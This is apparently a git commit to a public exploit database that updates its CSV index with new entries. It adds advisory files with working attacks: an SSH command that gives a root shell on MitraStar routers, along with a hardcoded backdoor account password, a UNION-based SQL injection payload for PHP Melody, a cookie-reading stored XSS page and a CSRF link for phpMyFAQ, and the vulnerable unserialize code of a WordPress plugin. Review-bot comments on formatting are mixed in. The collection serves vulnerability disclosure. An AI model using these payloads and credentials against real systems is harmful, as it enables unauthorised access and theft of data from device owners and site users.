DB: 2017-10-31
43 new exploits Microsoft Internet Explorer 6.0/7.0 - RemoveChild Denial of Service Microsoft Internet Explorer 6.0/7.0 - 'RemoveChild' Denial of Service SGI IRIX 6.3 Systour and OutOfBox - Exploit SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Exploit Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free Novell eDirectory 9.0 - DHost Remote Buffer Overflow Novell eDirectory 9.0 - 'DHost' Remote Buffer Overflow Cisco IOS 12.3(18) (FTP Server) - Remote Exploit (Attached to GDB) Cisco IOS 12.3(18) (FTP Server) - Remote Exploit (Attached to GDB) Opera 9.61 - opera:historysearch Code Execution (PoC) Opera 9.61 - 'opera:historysearch' Code Execution (PoC) Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal Microsoft Windows 95/WfW - smbclient Directory Traversal Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal RSA Authentication Agent for Web 5.3 - Open Redirection RSA Authentication Agent for Web 5.3 - Open Redirection Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection HP System Management Homepage - 'RedirectUrl' Open Redirection HP System Management Homepage - 'RedirectUrl' Open Redirection FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation MyPHP Forum 3.0 - Edit Topics/Blind SQL Injection MyPHP Forum 3.0 - Edit Topics / Blind SQL Injection ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities ILIAS Lms 
3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities Tkai's Shoutbox - 'Query' Open Redirection Tkai's Shoutbox - 'Query' Open Redirection SAP Web Application Server 6.x/7.0 - Open Redirection SAP Web Application Server 6.x/7.0 - Open Redirection UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection Autonomy Ultraseek - 'cs.html' Open Redirection Autonomy Ultraseek - 'cs.html' Open Redirection Joomla! Component com_user - 'view' Open Redirection Joomla! Component com_user - 'view' Open Redirection MBoard 1.3 - 'url' Open Redirection MBoard 1.3 - 'url' Open Redirection Sitecore CMS 6.4.1 - 'url' Open Redirection Sitecore CMS 6.4.1 - 'url' Open Redirection Orchard 1.3.9 - 'ReturnUrl' Open Redirection Orchard 1.3.9 - 'ReturnUrl' Open Redirection Tiki Wiki CMS Groupware - 'url' Open Redirection Tiki Wiki CMS Groupware - 'url' Open Redirection WebsitePanel - 'ReturnUrl' Open Redirection WebsitePanel - 'ReturnUrl' Open Redirection ocPortal 7.1.5 - 'redirect' Open Redirection ocPortal 7.1.5 - 'redirect' Open Redirection Silverstripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS 2.4.x - 'BackURL' Open Redirection PHP Melody 2.6.1 - SQL Injection PHPMyFAQ 2.9.8 - Cross-Site Scripting (3) phpMyFAQ 2.9.8 - Cross-Site Request Forgery WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection Zomato Clone Script - 'resid' SQL Injection Website Broker Script - 'status_id' SQL Injection Vastal I-Tech Agent Zone - SQL Injection Php Inventory - Arbitrary File Upload Online Exam Test Application - 'sort' SQL Injection Nice PHP FAQ Script - 'nice_theme' SQL Injection Fake Magazine Cover Script - SQL Injection CPA Lead Reward Script - SQL Injection Basic B2B Script - SQL Injection CmsLite 1.4 - 'S' SQL Injection MyMagazine 1.0 - 'id' SQL Injection News 1.0 - SQL Injection Newspaper 1.0 - SQL Injection US Zip Codes Database - 'state' SQL Injection Shareet - 'photo' 
SQL Injection AROX School ERP PHP Script - 'id' SQL Injection Protected Links - SQL Injection ZeeBuddy 2x - 'groupid' SQL Injection Vastal I-Tech Dating Zone 0.9.9 - 'product_id' SQL Injection tPanel 2009 - Authentication Bypass Sokial Social Network Script 1.0 - SQL Injection SoftDatepro Dating Social Network 1.3 - SQL Injection Same Sex Dating Software Pro 1.0 - SQL Injection PHP CityPortal 2.0 - SQL Injection PG All Share Video 1.0 - SQL Injection MyBuilder Clone 1.0 - 'subcategory' SQL Injection Mailing List Manager Pro 3.0 - SQL Injection Joomla! Component Zh YandexMap 6.1.1.0 - 'placemarklistid' SQL Injection Joomla! Component NS Download Shop 2.2.6 - 'id' SQL Injection Job Board Script - 'nice_theme' SQL Injection iTech Gigs Script 1.21 - SQL Injection iStock Management System 1.0 - Arbitrary File Upload iProject Management System 1.0 - 'ID' SQL Injection Article Directory Script 3.0 - 'id' SQL Injection Adult Script Pro 2.2.4 - SQL Injection D-Park Pro 1.0 - SQL Injection Ingenious 2.3.0 - Arbitrary File Upload Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure
This commit is contained in:
parent
9352001fe6
commit
33cc894818
45 changed files with 1815 additions and 28 deletions
55
files.csv
55
files.csv
|
@ -3674,7 +3674,7 @@ id,file,description,date,author,platform,type,port
|
|||
28855,platforms/windows/dos/28855.txt,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)",2013-10-10,metacom,windows,dos,0
|
||||
28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service",2006-10-24,"Federico Fazzi",windows,dos,0
|
||||
40374,platforms/windows/dos/40374.html,"Microsoft Internet Explorer 11.0.9600.18482 - Use After Free",2016-09-13,"Marcin Ressel",windows,dos,0
|
||||
28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - RemoveChild Denial of Service",2006-10-30,"Wojciech H",windows,dos,0
|
||||
28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - 'RemoveChild' Denial of Service",2006-10-30,"Wojciech H",windows,dos,0
|
||||
28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service",2006-11-01,"Matousec Transparent security",windows,dos,0
|
||||
28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service",2006-11-02,LMH,linux,dos,0
|
||||
28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7 - MHTML Denial of Service",2006-11-02,"Positive Technologies",windows,dos,0
|
||||
|
@ -7448,7 +7448,7 @@ id,file,description,date,author,platform,type,port
|
|||
19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 suid_exec - Exploit",1996-12-02,"Yuri Volobuev",irix,local,0
|
||||
19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 sgihelp - Exploit",1996-12-02,anonymous,aix,local,0
|
||||
19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 startmidi - Exploit",1997-02-09,"David Hedley",irix,local,0
|
||||
19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 Systour and OutOfBox - Exploit",1996-10-30,"Tun-Hui Hu",irix,local,0
|
||||
19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Exploit",1996-10-30,"Tun-Hui Hu",irix,local,0
|
||||
19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 xfsdump - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0
|
||||
19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",windows,local,0
|
||||
19360,platforms/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Buffer Overflow",1997-12-21,"Solar Designer",linux,local,0
|
||||
|
@ -9841,7 +9841,7 @@ id,file,description,date,author,platform,type,port
|
|||
2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0
|
||||
2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028
|
||||
2680,platforms/win_x86/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",win_x86,remote,80
|
||||
2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - DHost Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0
|
||||
2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - 'DHost' Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0
|
||||
2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80
|
||||
2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0
|
||||
2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 - 'nfsd.exe' Remote Stack Overflow (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049
|
||||
|
@ -10365,7 +10365,7 @@ id,file,description,date,author,platform,type,port
|
|||
6873,platforms/windows/remote/6873.html,"MW6 PDF417 - ActiveX 'MW6PDF417.dll' Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0
|
||||
6875,platforms/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX - 'VSPDFViewerX.ocx' File Overwrite",2008-10-29,"Marco Torti",windows,remote,0
|
||||
6878,platforms/windows/remote/6878.html,"DjVu - ActiveX Control 3.0 ImageURL Property Overflow",2008-10-30,"Shahriyar Jalayeri",windows,remote,0
|
||||
6880,platforms/windows/remote/6880.html,"Opera 9.61 - opera:historysearch Code Execution (PoC)",2008-10-30,"Aviv Raff",windows,remote,0
|
||||
6880,platforms/windows/remote/6880.html,"Opera 9.61 - 'opera:historysearch' Code Execution (PoC)",2008-10-30,"Aviv Raff",windows,remote,0
|
||||
6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 / WL54AP2 - Cross-Site Request Forgery / Cross-Site Scripting",2008-10-31,"Henri Lindberg",hardware,remote,0
|
||||
6921,platforms/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 - 'writeFile()' API Exploit (Metasploit)",2008-11-01,"Kevin Finisterre",windows,remote,0
|
||||
6963,platforms/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution (PoC)",2008-11-03,shinnai,windows,remote,0
|
||||
|
@ -10942,7 +10942,7 @@ id,file,description,date,author,platform,type,port
|
|||
15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - 'soap_action_name' POST UPnP 'sscanf' Buffer Overflow",2010-10-28,n00b,windows,remote,0
|
||||
15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
|
||||
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit",2010-10-29,Unknown,windows,remote,0
|
||||
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
|
||||
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
|
||||
15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
|
||||
15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
|
||||
15371,platforms/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
|
||||
|
@ -12305,7 +12305,7 @@ id,file,description,date,author,platform,type,port
|
|||
20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential (Metasploit)",2012-08-08,Metasploit,windows,remote,0
|
||||
20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",hardware,remote,0
|
||||
20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",cgi,remote,0
|
||||
20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW - smbclient Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0
|
||||
20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0
|
||||
20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval",2000-10-26,@stake,hardware,remote,0
|
||||
20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0
|
||||
20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0
|
||||
|
@ -15930,6 +15930,7 @@ id,file,description,date,author,platform,type,port
|
|||
43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0
|
||||
43055,platforms/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,hardware,remote,0
|
||||
43059,platforms/windows/remote/43059.py,"DameWare Remote Controller < 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,windows,remote,0
|
||||
43061,platforms/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,hardware,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -38754,3 +38755,45 @@ id,file,description,date,author,platform,type,port
|
|||
43052,platforms/php/webapps/43052.txt,"FS Realtor Clone - 'id' SQL Injection",2017-10-24,8bitsec,php,webapps,0
|
||||
43053,platforms/nodejs/webapps/43053.txt,"KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection",2017-10-25,"Ishaq Mohammed",nodejs,webapps,0
|
||||
43054,platforms/nodejs/webapps/43054.txt,"KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting",2017-10-25,"Ishaq Mohammed",nodejs,webapps,0
|
||||
43062,platforms/php/webapps/43062.txt,"PHP Melody 2.6.1 - SQL Injection",2017-10-28,"Venkat Rajgor",php,webapps,0
|
||||
43063,platforms/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",php,webapps,0
|
||||
43064,platforms/php/webapps/43064.txt,"phpMyFAQ 2.9.8 - Cross-Site Request Forgery",2017-10-27,"Nikhil Mittal",php,webapps,0
|
||||
43065,platforms/php/webapps/43065.py,"WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection",2017-10-30,tomplixsee,php,webapps,0
|
||||
43066,platforms/php/webapps/43066.txt,"Zomato Clone Script - 'resid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43067,platforms/php/webapps/43067.txt,"Website Broker Script - 'status_id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43068,platforms/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43069,platforms/php/webapps/43069.txt,"Php Inventory - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43070,platforms/php/webapps/43070.txt,"Online Exam Test Application - 'sort' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43071,platforms/php/webapps/43071.txt,"Nice PHP FAQ Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43072,platforms/php/webapps/43072.txt,"Fake Magazine Cover Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43073,platforms/php/webapps/43073.txt,"CPA Lead Reward Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43074,platforms/php/webapps/43074.txt,"Basic B2B Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43075,platforms/php/webapps/43075.txt,"CmsLite 1.4 - 'S' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43076,platforms/php/webapps/43076.txt,"MyMagazine 1.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43077,platforms/php/webapps/43077.txt,"News 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43078,platforms/php/webapps/43078.txt,"Newspaper 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43079,platforms/php/webapps/43079.txt,"US Zip Codes Database - 'state' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43080,platforms/php/webapps/43080.txt,"Shareet - 'photo' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43081,platforms/php/webapps/43081.txt,"AROX School ERP PHP Script - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43082,platforms/php/webapps/43082.txt,"Protected Links - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43083,platforms/php/webapps/43083.txt,"ZeeBuddy 2x - 'groupid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43084,platforms/php/webapps/43084.txt,"Vastal I-Tech Dating Zone 0.9.9 - 'product_id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43085,platforms/php/webapps/43085.txt,"tPanel 2009 - Authentication Bypass",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43086,platforms/php/webapps/43086.txt,"Sokial Social Network Script 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43087,platforms/php/webapps/43087.txt,"SoftDatepro Dating Social Network 1.3 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43088,platforms/php/webapps/43088.txt,"Same Sex Dating Software Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43089,platforms/php/webapps/43089.txt,"PHP CityPortal 2.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43090,platforms/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43091,platforms/php/webapps/43091.txt,"MyBuilder Clone 1.0 - 'subcategory' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43092,platforms/php/webapps/43092.txt,"Mailing List Manager Pro 3.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43093,platforms/php/webapps/43093.txt,"Joomla! Component Zh YandexMap 6.1.1.0 - 'placemarklistid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43094,platforms/php/webapps/43094.txt,"Joomla! Component NS Download Shop 2.2.6 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43095,platforms/php/webapps/43095.txt,"Job Board Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43096,platforms/php/webapps/43096.txt,"iTech Gigs Script 1.21 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43097,platforms/php/webapps/43097.txt,"iStock Management System 1.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43098,platforms/php/webapps/43098.txt,"iProject Management System 1.0 - 'ID' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43099,platforms/php/webapps/43099.txt,"Article Directory Script 3.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43100,platforms/php/webapps/43100.txt,"Adult Script Pro 2.2.4 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43101,platforms/php/webapps/43101.txt,"D-Park Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43102,platforms/php/webapps/43102.txt,"Ingenious 2.3.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0
|
||||
43103,platforms/xml/webapps/43103.py,"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure",2017-10-30,mr_me,xml,webapps,0
|
||||
|
|
|
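Review bot: The two phpMyFAQ rows added in the last hunk spell the product differently — the 43063 row says "PHPMyFAQ 2.9.8" while the 43064 row says "phpMyFAQ 2.9.8" — and both advisory files added in this commit use the lowercase form, so the 43063 description should read `"phpMyFAQ 2.9.8 - Cross-Site Scripting (3)"`. The 43063 advisory text describes a stored XSS via an HTML attachment, yet the index only records "Cross-Site Scripting (3)", which makes the row hard to distinguish from the earlier phpMyFAQ XSS entries when searching the CSV. The remaining hunks in this section are title normalizations and need no change.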
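--- a/platforms/hardware/remote/43061.txt
+++ b/platforms/hardware/remote/43061.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Privilege escalation MitraStar routers
+# Date: 28-10-2017
+# Exploit Author: j0lama
+# Vendor Homepage: http://www.mitrastar.com/
+# Provider Homepage: https://www.movistar.com/
+# Models affected: MitraStar DSL-100HN-T1 and MitraStar GPT-2541GNAC (HGU)
+# Software versions: ES_113WJY0b16 (DSL-100HN-T1) and 1.00(VNJ0)b1 (GPT-2541GNAC)
+# Vulnerability analysis: http://jolama.es/temas/router-attack/index.php
+
+Description
+-----------
+SSH has a bad configuration that allows execute commands when you connect avoiding the default shell that the manufacturer provide us.
+
+$ ssh 1234@ip /bin/sh
+
+This give us a shell with root permissions.
+
+Note: the password for 1234 user is under the router.
+
+You can copy all file system to your local machine using scp.
+In some of the MitraStar routers there is a zyad1234 user with password zyad1234 that have the same permissions of the 1234 user (root).
+
+
+Solution
+--------
+In the latest firmware versions this have been fixed.
+If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before.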
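Review bot: The Solution section says the issue is fixed "in the latest firmware versions" but never names the fixed build, while the header pins the affected builds (ES_113WJY0b16 and 1.00(VNJ0)b1), so a reader cannot tell from this file which firmware to verify against. A line such as `# Fixed in: <firmware version to be confirmed by author>` beside "Software versions" would close that gap. The free-text title "Privilege escalation MitraStar routers" also differs from the files.csv entry for 43061 ("MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation"), which the database otherwise keeps in step with the file header.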
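--- a/platforms/php/webapps/43062.txt
+++ b/platforms/php/webapps/43062.txt
@@ -0,0 +1,18 @@
+###################################################
+[+] Author : Venkat Rajgor
+[+] Email : Venki9990@gmail.com
+[+] Vulnerability : SQL injection
+###################################################
+E-mail ID : support@phpsugar.com
+Download : http://www.phpsugar.com
+Web : http://www.phpsugar.com
+Price : $39 USD
+###################################################
+Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
+Application : PHPSUGAR PHP Melody version 2.6.1
+Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
+###################################################
+
+Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.
+
+Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -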
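Review bot: The header block carries no Date, Version-tested or CVE field, unlike every other advisory in this commit, so the entry cannot be dated or cross-referenced from the file alone; adding `Date : 28-10-2017` (the date files.csv records for 43062) and a `CVE : N/A` line would bring it in line with the rest. The "Payload Used" line also contains stray spaces inside its hex literals and before a comma, which reads like copy-paste wrapping rather than intent and should be checked against the original submission before it is indexed.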
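--- a/platforms/php/webapps/43063.txt
+++ b/platforms/php/webapps/43063.txt
@@ -0,0 +1,41 @@
+# Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vulnerability
+# Date: 28-9-2017
+# Exploit Author: Nikhil Mittal (Payatu Labs)
+# Vendor Homepage: http://www.phpmyfaq.de/
+# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
+# Version: 2.9.8
+# Tested on: MAC OS
+# CVE : 2017-15727
+
+1. Description
+
+In phpMyFAQ before 2.9.9, there is Stored Cross-site Scripting (XSS) via an HTML attachment.
+
+2. Proof of concept
+
+Exploit code
+
+<!DOCTYPE html>
+<html>
+<head>
+<title>XSS EXPLOIT</title>
+</head>
+<body>
+<script>confirm(document.cookie)</script>
+</body>
+</html>
+
+
+
+Steps to reproduce:
+
+1. Create a user having limited access rights to attachment section
+2. Goto http://localhost/phpmyfaq/admin/?action=editentry
+2. Upload the exploit code with .html extension at the place of attachements
+3. Access the file url generated at /phpmyfaq/attachments/<random_path>
+4. Reach to last file using directory traversal and XSS will triage
+
+3. Solution
+
+Update to phpMyFAQ Version 2.9.9
+http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip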
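Review bot: The CVE line reads `# CVE : 2017-15727` without the `CVE-` prefix, while the other advisories in this commit (43066, 43067, 43068) use the full `CVE-2017-...` form; `# CVE : CVE-2017-15727` keeps the identifier greppable and matches the database convention. The reproduction steps are numbered 1, 2, 2, 3, 4, so the second "2." line should become 3 and the remaining steps shifted. The same missing prefix affects `# CVE : 2017-15730` in 43064.txt.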
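--- a/platforms/php/webapps/43064.txt
+++ b/platforms/php/webapps/43064.txt
@@ -0,0 +1,29 @@
+# Exploit Title: phpMyFAQ 2.9.8 CSRF Vulnerability
+# Date: 27-9-2017
+# Exploit Author: Nikhil Mittal (Payatu Labs)
+# Vendor Homepage: http://www.phpmyfaq.de/
+# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
+# Version: 2.9.8
+# Tested on: MAC OS
+# CVE : 2017-15730
+
+1. Description
+
+In phpMyFAQ before 2.9.8, there is Cross-Site Request Forgery (CSRF) in admin/stat.ratings.php.
+
+2. Proof of concept
+
+<html>
+<head>
+<title>PHPMYSQL CSRF EXPLOIT</title>
+</head>
+<body>
+<a href="http://127.0.0.1/phpmyfaq/admin/?action=clear-statistics">EXPLOIT!</a>
+</body>
+</html>
+
+
+3. Solution
+
+Update to phpMyFAQ Version 2.9.9
+http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip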
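Review bot: The Description states the CSRF exists "in phpMyFAQ before 2.9.8", but the header lists 2.9.8 as the tested version and the Solution tells readers to update to 2.9.9, so the version bound in the description contradicts the rest of the file; it presumably should read `In phpMyFAQ before 2.9.9, ...`, to be confirmed with the author. The PoC page title "PHPMYSQL CSRF EXPLOIT" names a different product than the one under test and could be corrected to phpMyFAQ for consistency.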
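--- a/platforms/php/webapps/43065.py
+++ b/platforms/php/webapps/43065.py
@@ -0,0 +1,66 @@
+# Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection]
+# Google Dork: [NA]
+# Date: [Okt 30 2017]
+# Exploit Author: [tomplixsee]
+# Author blog : [cupuzone.wordpress.com]
+# Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/]
+# Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/]
+# Version: [<= 4.2.24]
+# Tested on: [Ubuntu Server 16.04]
+# CVE : [NA]
+
+tested on app version 4.2.23, 4.2.24
+
+we can send an evil cookie (login not required) to vulnerable function
+1. vulnerable code on Functions/Process_Ajax.php <= tested
+
+203 // Adds an item to the plugin's cart
+204 function UPCP_Add_To_Cart() {
+205 global $woocommerce;
+206 global $wpdb;
+207 global $items_table_name;
+208
+209 $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout");
+210
+211 if ($WooCommerce_Checkout == "Yes") {
+212 $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID'])));
+213 echo "WC ID: " . $WC_Prod_ID . "<Br>";
+214 $woocommerce->cart->add_to_cart($WC_Prod_ID);
+215 }
+216
+217 if (isset($_COOKIE['upcp_cart_products'])) {
+218 $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products']));
+219 }
+220 else {
+221 $Products_Array = array();
+222 }
+223
+224 $Products_Array[] = $_POST['prod_ID'];
+225 $Products_Array = array_unique($Products_Array);
+226 setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/");
+227 }
+228 add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart');
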